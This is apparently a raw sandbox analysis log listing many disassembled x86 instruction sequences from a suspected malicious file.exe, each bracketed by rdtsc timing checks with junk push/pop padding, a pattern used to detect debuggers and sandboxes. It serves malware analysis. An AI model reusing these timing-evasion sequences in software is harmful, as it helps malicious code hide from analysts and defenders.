Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3EFBF second address: C3EFDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D2F0 second address: C3D35D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDAD10EAC3Eh 0x00000010 nop 0x00000011 jp 00007FDAD10EAC3Ah 0x00000017 mov bx, 949Ah 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 sub ebx, 5B4F7B11h 0x0000002f mov eax, dword ptr [ebp+122D1071h] 0x00000035 mov bx, ax 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FDAD10EAC38h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov ebx, dword ptr [ebp+122D2E32h] 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3E1E8 second address: C3E25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr fs:[00000000h], esp 0x00000018 jbe 00007FDAD0CA5E26h 0x0000001e mov eax, dword ptr [ebp+122D0085h] 0x00000024 jmp 00007FDAD0CA5E2Ah 0x00000029 push FFFFFFFFh 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FDAD0CA5E28h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 sub dword ptr [ebp+122D2287h], edx 0x0000004b nop 0x0000004c jng 00007FDAD0CA5E42h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FDAD0CA5E30h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D35D second address: C3D361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40048 second address: C4004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D361 second address: C3D367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4004D second address: C40052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40052 second address: C40058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C401FE second address: C40297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov edi, eax 0x00000008 push dword ptr fs:[00000000h] 0x0000000f mov edi, 6E5D7216h 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FDAD0CA5E28h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov di, 48A2h 0x00000039 mov eax, dword ptr [ebp+122D0A11h] 0x0000003f call 00007FDAD0CA5E38h 0x00000044 jmp 00007FDAD0CA5E39h 0x00000049 pop ebx 0x0000004a push FFFFFFFFh 0x0000004c pushad 0x0000004d jmp 00007FDAD0CA5E2Bh 0x00000052 add edx, dword ptr [ebp+122D2E4Eh] 0x00000058 popad 0x00000059 sub edi, dword ptr [ebp+122D2619h] 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 pop esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40297 second address: C402A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C421BF second address: C421D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDAD0CA5E2Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41367 second address: C4138D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b js 00007FDAD10EAC36h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007FDAD10EAC3Ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4138D second address: C41393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C43225 second address: C4322A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C441E8 second address: C441EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C441EE second address: C441F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C43448 second address: C43461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD0CA5E34h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C441F4 second address: C44219 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDAD10EAC46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C43461 second address: C43467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44219 second address: C4421F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4421F second address: C4426B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D2641h], eax 0x00000013 push 00000000h 0x00000015 jmp 00007FDAD0CA5E38h 0x0000001a push 00000000h 0x0000001c add bx, F342h 0x00000021 xchg eax, esi 0x00000022 jmp 00007FDAD0CA5E31h 0x00000027 push eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47263 second address: C47269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47269 second address: C47278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FDAD0CA5E26h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47806 second address: C47817 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47817 second address: C4781C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4781C second address: C47841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 cmc 0x00000009 push 00000000h 0x0000000b mov dword ptr [ebp+1247CD83h], ebx 0x00000011 push 00000000h 0x00000013 movsx ebx, ax 0x00000016 mov ebx, 0BA6A0B8h 0x0000001b push eax 0x0000001c push edi 0x0000001d jo 00007FDAD10EAC3Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47AA4 second address: C47AAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C443BD second address: C443D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C443D6 second address: C443DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A7B0 second address: C4A7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A7B6 second address: C4A7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A7BC second address: C4A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4AA23 second address: C4AA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4AA29 second address: C4AA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FDAD10EAC44h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FDAD10EAC3Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BA8F second address: C4BA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5562D second address: C55631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55631 second address: C5564B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDAD0CA5E30h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5564B second address: C55657 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDAD10EAC36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54DAE second address: C54DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54DB2 second address: C54DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FDAD10EAC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5506E second address: C5507E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007FDAD0CA5E26h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AA99 second address: C5AACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FDAD10EAC3Ch 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FDAD10EAC40h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007FDAD10EAC36h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AACF second address: C5AAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AAD3 second address: C5AAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5ABD8 second address: C5ABDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5ABDF second address: C5ABF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FDAD10EAC36h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5ABF0 second address: C5AC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FDAD0CA5E2Bh 0x00000011 jmp 00007FDAD0CA5E34h 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AC24 second address: C5AC2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AC2A second address: C5AC4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jp 00007FDAD0CA5E30h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AD17 second address: C5AD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 jnl 00007FDAD10EAC3Ch 0x0000000e push ebx 0x0000000f jmp 00007FDAD10EAC44h 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5ADCE second address: A83C4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1AA299FDh 0x00000010 pushad 0x00000011 movzx edi, cx 0x00000014 popad 0x00000015 push dword ptr [ebp+122D078Dh] 0x0000001b stc 0x0000001c jmp 00007FDAD0CA5E2Fh 0x00000021 call dword ptr [ebp+122D25D5h] 0x00000027 pushad 0x00000028 cld 0x00000029 ja 00007FDAD0CA5E2Ch 0x0000002f mov dword ptr [ebp+122D228Ch], edi 0x00000035 xor eax, eax 0x00000037 mov dword ptr [ebp+122D26B3h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007FDAD0CA5E34h 0x00000046 mov dword ptr [ebp+122D2BDEh], eax 0x0000004c pushad 0x0000004d pushad 0x0000004e and eax, dword ptr [ebp+122D2EEAh] 0x00000054 add dx, 65BDh 0x00000059 popad 0x0000005a popad 0x0000005b mov esi, 0000003Ch 0x00000060 mov dword ptr [ebp+122D228Ch], ecx 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a xor dword ptr [ebp+122D26B3h], eax 0x00000070 lodsw 0x00000072 add dword ptr [ebp+122D26B3h], ebx 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c xor dword ptr [ebp+122D26B3h], ebx 0x00000082 stc 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 cld 0x00000088 push eax 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E541 second address: C5E545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E545 second address: C5E54F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E54F second address: C5E564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC41h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EC5E second address: C5EC6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FDAD0CA5E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EC6D second address: C5EC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FDAD10EAC3Eh 0x00000010 jg 00007FDAD10EAC36h 0x00000016 pushad 0x00000017 popad 0x00000018 jns 00007FDAD10EAC3Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EC93 second address: C5ECAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007FDAD0CA5E30h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5ECAC second address: C5ECB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5ECB5 second address: C5ECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EF75 second address: C5EF88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EF88 second address: C5EF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EF8E second address: C5EFB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC44h 0x00000007 jmp 00007FDAD10EAC3Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EFB8 second address: C5EFCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FDAD0CA5E26h 0x0000000d jbe 00007FDAD0CA5E26h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EFCC second address: C5EFD1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EFD1 second address: C5EFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EFDC second address: C5EFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7B4B second address: BE7B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E34h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDAD0CA5E2Fh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7B7B second address: BE7B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FDAD10EAC36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7B8A second address: BE7B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7B8E second address: BE7B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7B92 second address: BE7BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD0CA5E2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7BAA second address: BE7BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C682F9 second address: C6832D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FDAD0CA5E37h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAD0CA5E35h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6832D second address: C68342 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FDAD10EAC36h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c push eax 0x0000000d jnc 00007FDAD10EAC36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C671CF second address: C671D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C67338 second address: C6733F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A071 second address: C3A07B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A07B second address: C199A5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDAD10EAC3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb edx, 493960A5h 0x00000013 lea eax, dword ptr [ebp+12489DC6h] 0x00000019 sub dword ptr [ebp+122D2287h], ecx 0x0000001f push eax 0x00000020 jmp 00007FDAD10EAC47h 0x00000025 mov dword ptr [esp], eax 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D2ADAh], ebx 0x0000002f add dword ptr [ebp+122D248Ch], edi 0x00000035 popad 0x00000036 call dword ptr [ebp+122D286Eh] 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push edx 0x00000040 pop edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A4DB second address: C3A4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDAD0CA5E39h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A7A0 second address: C3A7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A7A6 second address: C3A7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
